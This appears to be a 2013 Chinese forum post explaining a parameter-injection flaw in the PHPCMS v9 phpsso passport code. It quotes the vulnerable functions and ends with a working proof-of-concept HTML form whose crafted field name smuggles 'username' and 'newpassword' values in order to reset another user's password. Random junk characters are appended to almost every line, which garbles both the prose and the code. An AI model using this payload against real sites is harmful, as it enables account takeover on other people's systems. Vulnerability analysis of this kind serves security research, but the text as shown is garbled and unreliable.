提到的通行证的代码:& l6 Z4 P2 b& ]9 U: }* o
+ D% Z6 H" ~0 b
1 e+ L/ b8 P0 m7 l i
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);8 x4 U# a \: p% Z. q" @$ `2 b G
4 b" y" d0 i; \: N在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
- `) L6 R! E! y' `) s6 H
8 X) N$ E, c( C1 H$ ~" T4 p8 C我把它留给了你们。
4 f) t; B3 ]- U3 H5 T0 ]不知道你们发现了它没有。% @# t' ^& U6 T; E1 ~7 v2 l7 w
1 o8 P5 f' E1 C" R/ U我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。, M7 x7 w1 S: {( ~
. U- W3 O8 _/ U
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
% V; N, U6 i6 ~3 @1 }: Y% j, w1 c5 z1 W! Q+ Q) l
也就是
% c- n8 h% M* k3 a' b9 q% J. h# k0 Z' o2 A# X! n3 c
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。
* T4 P# w. @$ @% A& X4 E% D* u3 r4 c% x5 m L1 u
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。& f" t! R3 U/ C7 b u7 Y# s$ |" @$ o p
1 C$ f2 ]1 S( T4 B8 w6 q, c A* \& G1 Z% {
其实我们有这样的机会,看看代码,如下:
1 V: T3 T1 _! ^- @' o) H( g! q4 |$ J& Q" E
* q) w) p8 R- y8 N4 gpublic function auth_data($data) {+ ?/ C8 J9 O* O/ |2 H( [
$s = $sep = '';+ b7 S' Z4 G! K4 b+ c
foreach($data as $k => $v) {
8 \7 m- e8 M: u$ V# e% g9 n0 v if(is_array($v)) { A @" V% R* `1 O# g/ {4 y+ r/ [
$s2 = $sep2 = '';
! p- ]4 w- X* R% _1 Z2 W foreach($v as $k2 => $v2) {
/ P `) |7 W6 k3 e4 L6 C( k $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
5 ^! R9 l& d7 l' ^ $sep2 = '&';2 v) U- w5 H. T7 x. {: }4 S
}
( L4 K5 r) f* t' H) K9 L5 V) d+ F" A/ { $s .= $sep.$s2;( ~7 N8 ~; {; }# x/ n; O
} else {
6 C4 C4 w/ |. |% k* T4 k; g! v2 h8 _1 d $s .= "$sep$k=".$this->_ps_stripslashes($v);
5 b; P+ N8 Y% p" {- U }- |; e' h( S5 r: V; L- W
$sep = '&';
& e5 u" c* s5 u2 E# {( p3 _& y }
# u2 [3 T( A/ n4 Z) \4 ]
[" Z* l1 g+ R4 s. J. e6 b $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
" W* c' Z6 y8 I+ C+ G( W return $auth_s;+ Y, }+ q) E) l
}
: k5 C5 D- V( k. |) E
- L2 u0 g( m( c: ~- b: t可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。: k% B- l \$ y4 e" i4 z
6 A+ \& |+ r& e& C) R, q* u$ f举个例子
+ b1 U0 H5 ~' N7 s5 R& R4 R u' Y. ~! C1 j, _3 m$ c- V
$a[aaa=a&bbb] = 'a';
- J8 e7 q( J, b# d p& r0 k* U. S2 u @
会变成aaa=a&bbb=a: V9 X8 }0 w1 V2 _: r" x4 O
" u- |8 [$ L9 c3 ^. t- {, B- o
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。7 J' s6 B: ^2 S
1 c4 ~4 v; u6 j# i) b' O M/ B
这个时候,我们可以再去看一个函数。
' ? L0 }: J; ?) W7 O% p7 V. \
, B8 v+ h( p. I5 T$ T就在这个文件内:
2 f$ F" @& h8 c- Y$ k- ^8 D$ [) C
, k0 ?1 h3 L5 m2 V" q I* _8 D& q; T7 Z
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
( a3 Q1 u2 b5 L* V6 F! y if($email && !$this->_is_email($email)) {
. _1 w7 ], f/ d# b return -4;
+ N- P3 f* b. V9 I. L4 r }* Y9 t0 S8 L( O+ c+ I* N
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
# }0 _ v. G3 _5 _ }& a0 G- Z/ n' w! e
: h; _8 p" X4 {" l, e& D+ I1 z
这是向通行证发了这样一个请求。
- U+ y: V1 A6 G' ]9 v: e7 T" b* b7 v: G5 ~# }8 b
我们再跟到通信证代码里去看看,就会有所发现。; b% m) j8 u* k0 o* e, u. u) C
7 H2 ^4 i. V# L8 @
; b4 K" G/ \9 x2 W8 R+ }7 n
public function edit() {
1 }4 E% B4 y3 ~6 J3 f//能省就省,太长了不是吗?
$ i6 B) T. T9 D: O7 i0 j4 t6 b2 e
; ?0 {2 z: p( O1 O1 S6 I: oif($this->username) {
: X$ E0 l" s. b+ H0 z8 [$ P//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。4 H7 M* I+ Z. `- K( G' K" X- d
$res = $this->db->update($data, array('username'=>$this->username));
6 B5 {8 [& d- H, W- A! s; w5 _# S; p } else {2 o/ ?" o# R; F8 x* ?2 R6 z8 }
file_put_contents('typeb.txt',print_r($data,1).$this->uid);
. d7 n8 U9 t* u" q# m $res = $this->db->update($data, array('uid'=>$this->uid));
0 r" N9 G' N2 g G }
% P, u& o! v* Y: I5 |
: _4 ~8 W* P& k! v+ @' I) x* S好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
1 Y7 w6 k. W+ A! O# k/ e( V
9 D; {' N5 p. e/ P9 J4 Ypublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')% j8 P( G8 x0 g9 {
' F! \$ ]0 e: y( G$ |
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。0 O1 h) H2 K3 f2 A
' c" f! I+ U1 f8 C. F3 ?; A* f3 t& L( v
我当然找到了:, V$ e% E) p) M, s- h5 f
phpcms9/phpcms/modules/member/index.php9 r1 j& t: ~" j( L
% R% i. j3 |3 e4 A
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);( H, L, H) O) J/ b
. {, E, L3 s0 {7 p然后就没有然后了。
' }9 f+ U! o( {! u( e2 O4 i
# B* m$ v/ n9 q5 P( W2 i$ w<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">" @, h% h# F; O$ S2 g9 ~0 s5 d) a! p$ y
<table width="100%" cellspacing="0" class="table_form">
# U4 V$ P( H9 n6 E <tr>; I& R; P4 Y4 C4 c) o. U) o
<th width="80">邮箱:</th> ( L4 |/ p2 ?) |- F3 j2 l" Z& e
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>+ S, B8 R; F1 B1 Q6 |/ u! i N6 j( ^
</tr>$ M, Y X/ `* l
<tr>
: T5 f( Q! _6 z4 G) C& U; s) l" J <th width="80">原密码:</th> + F0 m. p( |5 ^0 K* b9 U
<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>; F4 d6 F: J1 Y$ y' ?
</tr>, n2 _: U/ B4 M' B# \/ C8 C s
<tr>/ y& M$ K" a+ h7 Z" }1 j
<th>新密码:</th>( Q8 q' |) r* b. a, k+ L8 B
<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
4 S* Q! D4 a. K4 d8 J </tr>8 R' z( p t2 m7 }. |3 K5 c
<th></th>' T; [. q. \* o$ } u
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>- d `. v0 P, I0 A) b, g2 ?- g
</tr>
( h; \" H, ?6 N$ M- L2 s- G </table>
8 h4 d5 r8 f. k: @: V$ C/ N& q
/ ^/ s) l# ?6 d9 p </form>2 U0 V7 Q$ l/ f$ l7 f$ j
|
发表于 2013-2-23 14:46:35
收藏
支持
反对